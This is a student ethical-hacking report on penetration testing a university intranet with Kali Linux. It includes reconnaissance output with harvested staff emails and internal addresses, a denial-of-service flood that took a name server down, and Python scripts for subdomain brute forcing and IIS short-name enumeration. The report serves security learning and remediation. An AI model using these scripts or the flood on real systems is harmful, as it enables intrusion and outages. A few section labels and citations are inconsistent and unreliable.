
In the Name of Allah, who is the most merciful and beneficent



Mehran University of Engineering and Technology, Jamshoro.


Department of Computer Systems Engineering

Ethical Hacking: Performing Penetration Test on LAN using Kali Linux

1. Muzamil Hussain Samejo (11CS45), Group Leader
2. Junaid Ahmed Abbasi (11CS35)
3. Bakhtiar Ali Khushik (11CS23)
4. Imran Ali Babar (11CS83)
5. Muhammad Taqi Abbasi (11-10CS43)

Supervised by: Engr. Salahuddin Jokhio

Contents
Introduction
Ethical Hacking and Penetration Testing
Aims and Objectives
Motivation
Methodology
Tools and Technologies
Scope of Project

Background
Literature Review
Related works

Tests and Results


Conclusion and Future Work
References

Introduction: Ethical Hacking & Penetration Testing
Ethical hacking is the authorised testing of an organisation's IT resources for a good cause: finding weaknesses so that they can be fixed, for the betterment of technology.
Technically, ethical hacking means penetration testing that is focused on securing and protecting IT systems [1].
Penetration testing (pen testing) is the method of testing a computer system, network or web application to find the vulnerabilities and threats that an attacker could exploit [2].

Aims and Objectives

Aim
Our major aim is to find weaknesses and problems in the network (the MUET Intranet) in terms of security threats and vulnerabilities.

Objectives
1. Perform a penetration test with various tools to detect problems
2. Analyse the detected problems
3. Propose solutions for the detected problems

Motivation
A network is always vulnerable to different threats unless its security has been verified [15].
Penetration testing means hacking one's own network in order to test its security [14].
The Sony Pictures Entertainment hack was a release of confidential data belonging to Sony Pictures Entertainment on November 24, 2014. The data included personal information about Sony Pictures employees and their families, e-mails between employees, information about executive salaries at the company, copies of unreleased Sony films, and other information. The hackers called themselves the "Guardians of Peace" or "GOP" and demanded the cancellation of the planned release of the film The Interview.
North Koreans were perhaps behind the attack, because of the film The Interview [11].
... economy $445 billion a year: report [12].

Methodology
1. Reconnaissance: information gathering using various tools
2. Scanning: vulnerability analysis
3. Reporting: summarisation of results
4. Proposal: solutions to the issues found

Tools and Technologies
Kali Linux

Tools for Reconnaissance (Information Gathering):
dnsdict6
theHarvester
dnsenum
Maltego

Tools for Scanning (Vulnerability Analysis):
Nmap, Zenmap
Cisco Global Exploiter
OpenVAS (Open Vulnerability Assessment System)

Why Kali Linux?
The most advanced penetration testing distribution ever [10].
More than 300 penetration testing tools [10].
Free and always will be [10].
Vast wireless device support [10].

Scope of the Project
The scope is not limited to network security: the same tools can be applied to check the security of web servers and applications.
Additionally, this project can help MUET ICPC personnel to improve the security level of the target network.
Moreover, the project helped us learn various technologies, including Linux scripting and tools for security analysis.

Background: Literature Review
This process of systematically and actively testing a deployed network to determine potential vulnerabilities is called penetration testing, and is also known as ethical hacking [3, 4].
Penetration testing helps expose common network misconfigurations and their security implications for the whole network and its users [5, 13].
Network security threats have been a problem since the birth of small networks with only a few hosts communicating over them [6].
Network threats and penetration testing are further explored in [7, 8, 9, 10].

Related Works
In [7], the project of the 08CS batch was published. It differed in that they used BackTrack, another Linux distribution for penetration testing.
[8, 12] provide system and network administrators with descriptions of various tools that can be used to proactively identify vulnerabilities before an adversary can.
In [9, 11], the Information Technology Laboratory at the National Institute of Standards and Technology (NIST) has recently released a draft document that can help risk managers appropriately scope their vulnerability assessment and penetration testing activities, while serving as a benchmark for comparing the testing services offered by various consultants.

Reconnaissance Results

dnsdict6

root@kali:~# dnsdict6 -d4 -x muet.edu.pk
Starting DNS enumeration work at muet.edu.pk. ...
Gathering NS and MX information...
NS of muet.edu.pk. is muet-02.muet.edu.pk. => 172.16.100.3
NS of muet.edu.pk. is muet-01.muet.edu.pk. => 172.16.100.220
No IPv6 address for NS entries found in DNS for domain muet.edu.pk.
MX of muet.edu.pk. is mail.muet.edu.pk. => 121.52.157.230
MX of muet.edu.pk. is muet-06.muet.edu.pk. => 172.16.100.11

Subdomains of muet.edu.pk

Hostname                    Host IP Address
www.muet.edu.pk             174.142.51.88
muet-01.muet.edu.pk         172.16.100.220
muet-02.muet.edu.pk         172.16.100.3
mail.muet.edu.pk            121.52.157.230
admissions.muet.edu.pk      174.142.39.199
acs.muet.edu.pk             172.16.100.201
publications.muet.edu.pk    172.16.21.167
imtic.muet.edu.pk           174.142.39.199
tl.muet.edu.pk              174.142.39.199
dp.muet.edu.pk              172.16.9.150
cs.muet.edu.pk              -
cisco.muet.edu.pk           -
-                           172.16.10.14

Note that the name server we queried hands out private (RFC 1918) addresses for acs, publications, dp and both name servers, while the public web hosts resolve to 174.142.x.x. The internal view of the zone therefore exposes the Intranet's address plan, which is exactly the information the reconnaissance phase is after.
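The brute-force step that dnsdict6 performs above, written out as a small Python script. This is an added example, not code from the slides or from the dnsdict6 project. It resolves each candidate label under the domain, discards answers that merely come from a wildcard record (a check every DNS brute forcer needs, otherwise every guess is a hit), and separates private (RFC 1918) addresses from public ones so that a split-horizon view like the one in the table stands out. The resolver is injectable: SAMPLE_ZONE is a constructed table built from the addresses in the slide so the script runs offline, and the fake resolver's optional wildcard address is an assumption for demonstrating the wildcard check; passing socket.gethostbyname instead runs the same code against live DNS.

```python
"""Subdomain brute force with wildcard detection and address classification.

Added example (not part of the original slides). The resolver is a plain
callable so the module runs offline against a constructed table.
"""
import ipaddress
import secrets
import socket
from typing import Callable, Dict, Iterable, Optional, Tuple

# hostname -> dotted IPv4 string; raises socket.gaierror when the name is unknown
Resolver = Callable[[str], str]

# Constructed sample standing in for the internal MUET resolver's answers.
# Addresses are taken from the dnsdict6 table above.
SAMPLE_ZONE: Dict[str, str] = {
    "www.muet.edu.pk": "174.142.51.88",
    "mail.muet.edu.pk": "121.52.157.230",
    "muet-01.muet.edu.pk": "172.16.100.220",
    "acs.muet.edu.pk": "172.16.100.201",
    "publications.muet.edu.pk": "172.16.21.167",
    "dp.muet.edu.pk": "172.16.9.150",
}

# Constructed wordlist: dnsdict6 ships much larger ones (-x selects the extreme list).
WORDLIST = ["www", "mail", "muet-01", "acs", "publications", "dp", "ftp", "vpn"]


def table_resolver(zone: Dict[str, str], wildcard: Optional[str] = None) -> Resolver:
    """Fake resolver: answers from `zone`; if `wildcard` is given (an assumed
    wildcard A record), every other name resolves to that address."""
    def resolve(name: str) -> str:
        if name in zone:
            return zone[name]
        if wildcard is not None:
            return wildcard
        raise socket.gaierror(-2, "Name or service not known")
    return resolve


def detect_wildcard(domain: str, resolve: Resolver) -> Optional[str]:
    """Resolve a random label under the domain. A hit means the zone has a
    wildcard record; returns its address, or None when there is no wildcard."""
    probe = f"{secrets.token_hex(8)}.{domain}"
    try:
        return resolve(probe)
    except (socket.gaierror, socket.herror):
        return None


def enumerate_subdomains(domain: str, wordlist: Iterable[str],
                         resolve: Resolver = socket.gethostbyname) -> Dict[str, str]:
    """Return {fqdn: address} for every word that resolves. Answers equal to
    the wildcard address are dropped: they are indistinguishable from noise,
    at the cost of missing a real host that shares the wildcard's address."""
    wildcard = detect_wildcard(domain, resolve)
    found: Dict[str, str] = {}
    for word in wordlist:
        fqdn = f"{word}.{domain}"
        try:
            ip = resolve(fqdn)
        except (socket.gaierror, socket.herror):
            continue
        if ip == wildcard:
            continue
        found[fqdn] = ip
    return found


def classify(found: Dict[str, str]) -> Tuple[Dict[str, str], Dict[str, str]]:
    """Split hits into (internal, public) by RFC 1918 / private address space."""
    internal: Dict[str, str] = {}
    public: Dict[str, str] = {}
    for fqdn, ip in found.items():
        target = internal if ipaddress.ip_address(ip).is_private else public
        target[fqdn] = ip
    return internal, public


if __name__ == "__main__":
    hits = enumerate_subdomains("muet.edu.pk", WORDLIST, table_resolver(SAMPLE_ZONE))
    internal, public = classify(hits)
    for label, group in (("internal", internal), ("public", public)):
        for fqdn, ip in sorted(group.items()):
            print(f"{label:8s} {fqdn:28s} {ip}")
```

Run against a live resolver, the internal/public split is the first thing to read: a public name server that returns private addresses is leaking internal topology, and a zone with a wildcard record needs a wordlist result to be checked against the wildcard address before it is believed.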

theHarvester

root@kali:~# theharvester -d muet.edu.pk -l 500 -b google

Emails found:
-----------------
jawaid.daudpoto@faculty.muet.edu.pk
saad.kalwar@faculty.muet.edu.pk
Noman.khan@faculty.muet.edu.pk
liquat.thebo@faculty.muet.edu.pk
naveed.jaffrey@faculty.muet.edu.pk
vc@muet.edu.pk
Kashif.dars@admin.muet.edu.pk
samejo@faculty.muet.edu.pk
naveed.jaffari@faculty.muet.edu.pk
swo@muet.edu.pk
feroze.shah@faculty.muet.edu.pk
suhail.soomro@faculty.muet.edu.pk
registrar@muet.edu.pk
info@muet.edu.pk

Hosts found in search engines:
-----------------------------------
174.142.51.88:www.muet.edu.pk
174.142.39.199:admissions.muet.edu.pk
174.142.39.199:publications.muet.edu.pk
174.142.39.199:tl.muet.edu.pk

Fourteen addresses, including the Vice Chancellor's and the Registrar's, and the faculty./admin. naming convention behind them, were collected from Google alone without sending a single packet to the target; this is the raw material for a phishing campaign. Note also that publications.muet.edu.pk resolves publicly to 174.142.39.199 while the internal name server gave 172.16.21.167 above, confirming the split view of the zone.

dnsenum

root@kali:~# dnsenum --enum muet.edu.pk
dnsenum.pl VERSION:1.2.3
Warning: can't load Net::Whois::IP module, whois queries disabled.

-----   muet.edu.pk   -----

Host's addresses:
__________________
muet.edu.pk.                5  IN  A  172.16.100.3
muet.edu.pk.                5  IN  A  172.16.100.220

Name Servers:
_____________
muet-02.muet.edu.pk.        5  IN  A  172.16.100.3
muet-01.muet.edu.pk.        5  IN  A  172.16.100.220

Trying Zone Transfers and getting Bind Versions:
________________________________________________
Trying Zone Transfer for muet.edu.pk on muet-02.muet.edu.pk ...
AXFR record query failed: Response code from server: REFUSED
Trying Zone Transfer for muet.edu.pk on muet-01.muet.edu.pk ...
AXFR record query failed: Response code from server: REFUSED

Scraping muet.edu.pk subdomains from Google:
____________________________________________
---- Google search page: 1 ----
Publications  eesd  MT  Moodle
---- Google search page: 2 ----
ieeep  wsn4dc  patco  Scholars

Both name servers refused the zone transfer, which is the correct configuration: a successful AXFR would have handed over the whole zone in a single query and made the brute force above unnecessary. The check can be repeated after any change to the servers with `dig @172.16.100.3 muet.edu.pk AXFR`.

Maltego
Results were shown as a screenshot of the transform graph (not reproduced here).

Scan Results

Nmap
Scan output was shown as screenshots (not reproduced here).

Cisco Global Exploiter

root@kali:~# cge.pl 172.16.100.220 2
No http server detected on 172.16.100.220 ...

root@kali:~# cge.pl 172.16.100.220 9
Input packets size : 10
Packets sent ... Please enter a server's open port : 23
Now checking server status ...
Vulnerability successful exploited. Target server is down ...

root@kali:~# cge.pl 172.16.100.220 9
Input packets size : 1
Packets sent ... Please enter a server's open port : 25
Now checking server status ...
Vulnerability unsuccessful exploited. Target server is still up ...

Option 2 of cge.pl is a Cisco IOS HTTP denial-of-service check and needs a web server on the target, which 172.16.100.220 does not expose. Option 9 is the Cisco UDP flood denial-of-service check: it floods the chosen port and then reports "down" if the host stops answering. That verdict is a liveness test, not proof of a Cisco flaw: the first run shows only that muet-01 (one of the two name servers) stopped responding after a flood of 10-byte packets aimed at port 23, and the second run, with 1-byte packets against port 25, left it up. The deck does not establish that the host is Cisco equipment at all, and taking a production name server down is an availability impact that has to be explicitly covered by the test's authorisation.

OpenVAS

Host                                 Most severe result   High   Medium   Low   Log   False positives
172.16.100.3 (muet-02.muet.edu.pk)   High                 10     75
Total: 1 host                                             10     75

Service (Port)          Threat Level
cpq-wbem (2301/tcp)     High
http (80/tcp)           Medium
domain (53/tcp)         Low

High cpq-wbem (2301/tcp)

High (CVSS: 10.0)
NVT: HP System Management Homepage Multiple Vulnerabilities
Product detection result
cpe:/a:hp:system_management_homepage:2.1.6.156 Detected by HP System Management Homepage (SMH) Version Detection (OID: 1.3.6.1.4.1.25623.1.0.900657)
Summary:
This host is running HP System Management Homepage (SMH) and is prone to multiple vulnerabilities.
Vulnerability Insight:
- An unspecified local security vulnerability
- A denial of service vulnerability
- An input validation vulnerability
- A privilege escalation vulnerability
- An information-disclosure vulnerability
Impact:
Successful exploitation will allow attackers to gain elevated privileges, disclose sensitive information, perform unauthorized actions, or cause denial of service conditions.
Impact Level: System/Application
Affected Software/OS:
HP System Management Homepage (SMH) versions before 7.1.1
Solution:
Upgrade to HP System Management Homepage (SMH) version 7.1.1 or later. For updates refer to
http://h18013.www1.hp.com/products/servers/management/age

The detected version, 2.1.6.156, is several major releases behind 7.1.1. Port 2301/tcp is the SMH HTTP redirector; the management console itself listens on 2381/tcp over HTTPS, so both ports should be reachable only from the management network until the upgrade is done.

Medium http (80/tcp)

Medium (CVSS: 5.0)
NVT: Microsoft IIS Tilde Character Information Disclosure Vulnerability
Product detection result
cpe:/a:microsoft:iis:6.0 Detected by Microsoft IIS Webserver Version Detection (OID: 1.3.6.1.4.1.25623.1.0.900710)
Summary:
This host is running Microsoft IIS Webserver and is prone to an information disclosure vulnerability.
Vulnerability Insight:
Microsoft IIS fails to validate a specially crafted GET request containing a '~' tilde character, which allows the disclosure of the short names of all folders and files with four-letter extensions.
Impact:
Successful exploitation will allow remote attackers to obtain sensitive information that could aid in further attacks.
Impact Level: Application
Affected Software/OS:
Microsoft Internet Information Services versions 7.5 and prior
Solution:
General solution options are to upgrade to a newer release, disable respective features, remove the product or replace the product by another one.

On IIS 6.0 the practical remediation is to disable 8.3 name creation (fsutil behavior set disable8dot3 1) and then recreate the existing files, because the setting does not strip short names already on disk; URLScan (or request filtering on IIS 7 and later) can additionally reject any URL containing '~'. IIS 6.0 also means Windows Server 2003, whose extended support ended on 14 July 2015, so the upgrade is the real fix.
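What the OpenVAS NVT above detects, as an added Python example (not code from the slides, from OpenVAS or from Microsoft). IIS 6.0 answers a request for a wildcard short name such as /a*~1*/.aspx differently depending on whether some file's 8.3 name matches (typically 404) or none does (typically 400), and that one-bit oracle lets a client recover the short names one character at a time. FakeIIS below is a constructed stand-in for the web root (SAMPLE_FILES is made up), with a flag that emulates the hardened behaviour, a request filter rejecting every '~' so all answers look alike; the same enumerator run against both shows why the fix works. Only the probe(pattern) -> status interface would change to issue real HTTP requests.

```python
"""IIS short-name (8.3, "tilde") enumeration against a simulated IIS 6.0 host.

Added example, not code from the slides or from OpenVAS. The scanner needs a
single thing from the server, probe(pattern) -> HTTP status; here FakeIIS
supplies it offline from a constructed file list.
"""
import fnmatch
import string
from typing import Callable, Dict, Iterable, List

# Probe alphabet for 8.3 names. Constructed subset: real scanners also try
# a few punctuation characters that NTFS allows in short names.
CHARSET = string.ascii_uppercase + string.digits + "_-"

# Constructed web root standing in for the IIS 6.0 host on 172.16.100.3.
SAMPLE_FILES = ["index.html", "web.config", "Default.aspx", "backup_2014.zip", "README"]

Probe = Callable[[str], int]


def short_name(long_name: str, seq: int = 1) -> str:
    """Approximate the 8.3 name NTFS assigns: the first six kept characters of
    the base name, '~seq', and the first three kept characters of the extension,
    upper-cased. 'backup_2014.zip' -> 'BACKUP~1.ZIP'."""
    base, dot, ext = long_name.rpartition(".")
    if not dot:                       # file without an extension
        base, ext = long_name, ""
    keep = lambda s: "".join(c for c in s.upper() if c in CHARSET)
    stem = f"{keep(base)[:6]}~{seq}"
    tail = keep(ext)[:3]
    return f"{stem}.{tail}" if tail else stem


def short_names(files: Iterable[str]) -> Dict[str, str]:
    """Map long names to unique short names, bumping ~1 to ~2, ~3 ... on a clash."""
    out: Dict[str, str] = {}
    for f in files:
        seq = 1
        while short_name(f, seq) in out.values():
            seq += 1
        out[f] = short_name(f, seq)
    return out


class FakeIIS:
    """Stand-in for the web server. Unpatched: a pattern matching some file's
    short name is answered 404 and a pattern matching nothing 400; that
    difference is the leak. With filtering=True (URLScan / request filtering
    denying '~') every request containing a tilde gets the same 404."""

    def __init__(self, files: Iterable[str], filtering: bool = False) -> None:
        self.shorts = set(short_names(files).values())
        self.filtering = filtering
        self.requests = 0

    def probe(self, pattern: str) -> int:
        self.requests += 1
        if self.filtering:
            return 404
        return 404 if any(fnmatch.fnmatchcase(s, pattern) for s in self.shorts) else 400


def is_vulnerable(probe: Probe) -> bool:
    """Calibration step used by the scanners: a catch-all pattern must be
    answered differently from one that can never match (no 8.3 name has an
    eight-character stem before '~1'). Equal answers mean no oracle."""
    return probe("*~1*") == 404 and probe("ZZZZZZZZ*~1*") == 400


def enumerate_short_names(probe: Probe, max_stem: int = 6) -> List[str]:
    """Recover every '~1' short name the server leaks, one character at a time."""
    found = set()

    def walk_ext(stem: str, ext: str) -> None:
        if ext and probe(f"{stem}~1.{ext}") == 404:   # exact match: extension done
            found.add(f"{stem}~1.{ext}")
        if len(ext) == 3:
            return
        for c in CHARSET:
            if probe(f"{stem}~1.{ext}{c}*") == 404:
                walk_ext(stem, ext + c)

    def walk_stem(stem: str) -> None:
        for c in CHARSET:
            cand = stem + c
            if probe(f"{cand}*~1*") != 404:            # no short name starts with cand
                continue
            if probe(f"{cand}~1*") == 404:             # cand is a complete stem
                if probe(f"{cand}~1") == 404:          # a file with no extension
                    found.add(f"{cand}~1")
                walk_ext(cand, "")
            if len(cand) < max_stem:
                walk_stem(cand)

    walk_stem("")
    return sorted(found)


if __name__ == "__main__":
    for label, server in (("unpatched", FakeIIS(SAMPLE_FILES)),
                          ("filtered", FakeIIS(SAMPLE_FILES, filtering=True))):
        if not is_vulnerable(server.probe):
            print(f"{label}: no status oracle, nothing to enumerate")
            continue
        names = enumerate_short_names(server.probe)
        print(f"{label}: {len(names)} short names in {server.requests} requests: {names}")
```

The calibration in is_vulnerable is what separates a scanner from a false-positive generator: against the filtered server every probe returns 404, so a naive enumerator would "find" every possible name, while the calibration sees identical answers and stops. The recovered names (for example BACKUP~1.ZIP) are exactly the kind of hint, an archive left in the web root, that the NVT's "could aid in further attacks" refers to.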

Low domain (53/tcp)

Low (CVSS: 0.0)
NVT: POP3 Server type and version
The remote POP3 server leaks information about the software it is running through the login banner. This may assist an attacker in choosing an attack strategy. Versions and types should be omitted where possible.
The version of the remote POP3 server is:
+OK Microsoft Exchange Server 2003 server version 6.5.7638.1 (muet-02.muet.edu.pk) ready.
Solution: Change the login banner to something generic.

The banner matters less for what it reveals than for what it confirms: the host still runs Exchange Server 2003, which left Microsoft extended support in April 2014, so no further security fixes are coming for it.

Conclusion
From our results we conclude that the subject network, the MUET academic Intranet, has a number of security issues. We found flaws and shortcomings in its overall security: many ports are open, carrying vulnerabilities of different severities. Using very simple tools we could gather a great deal of information about the network, information that could be used for malicious purposes such as hacking attacks or denial-of-service attacks.

Future Work
For future work, we could carry out penetration tests on wireless networks to extend our learning, and check the security of the switches and bridges more regularly. Penetration tests of other network services, such as the security of the routers, could also be done, together with work on security protocols and on the CIA triad of security: confidentiality, integrity and availability.

References
Books
[1] James Broad and Andrew Bindner, Hacking with Kali, Syngress, 2013, p. 123.
[2] Thomas Wilhelm, Professional Penetration Testing, 2nd Edition, Syngress, 2013, p. 186.
[3] Hamisi, N.Y., Mvungi, N.H., Mfinanga, D.A. and Mwinyiwiwa, B.M.M., Intrusion detection by penetration test in an organization network, ICAST 2009.
[4] Bishop, M., About Penetration Testing, IEEE Security and Privacy (2007), Volume 5, Issue 6.
[5] A. Bechtsoudis and N. Sklavos, Aiming at Higher Network Security Through Extensive Penetration Tests, IEEE Latin America Transactions, Vol. 10, No. 3, April 2012, pp. 1752-1757.
[6] S. Hansman and R. Hunt, A taxonomy of network and computer attacks, Computers & Security (2005), Volume 24, Issue 1, Elsevier, pp. 31-43.
[7] Dr-K, A Complete Hacker's Handbook, Carlton Books, 2000, p. 49.
[8] Joel Lanz, Tech Consortium Formed to Improve Software Reliability, Computerworld, May 20, 2002, pp. 12-28.
[9] McClure, Scambray and Kurtz, Hacking Exposed, 2001, p. 702.

Websites
[10] Official Kali Linux site, https://www.kali.org/official-documentation/, last accessed 12 January 2015.
[11] Computerworld, http://www.computerworld.com/article/2851797/security0/fake-gop-pwns-sony-networks-worldwide.html, last accessed 10/12/2014.
[12] Cyber Risk Network, http://www.cyberrisknetwork.com/2014/05/09/coverage-category-privacy-violations/, last accessed 31/12/2014.
[13] Veracode, http://www.veracode.com/security/attacks, last accessed 23/09/2014.
[14] Official BackTrack site, http://www.backtrack-linux.org/, last accessed 12/08/2014.
[15] Cyber hacks blog, http://cehacks.blogspot.in/search/label/kali%20linux, last accessed 10/07/2014.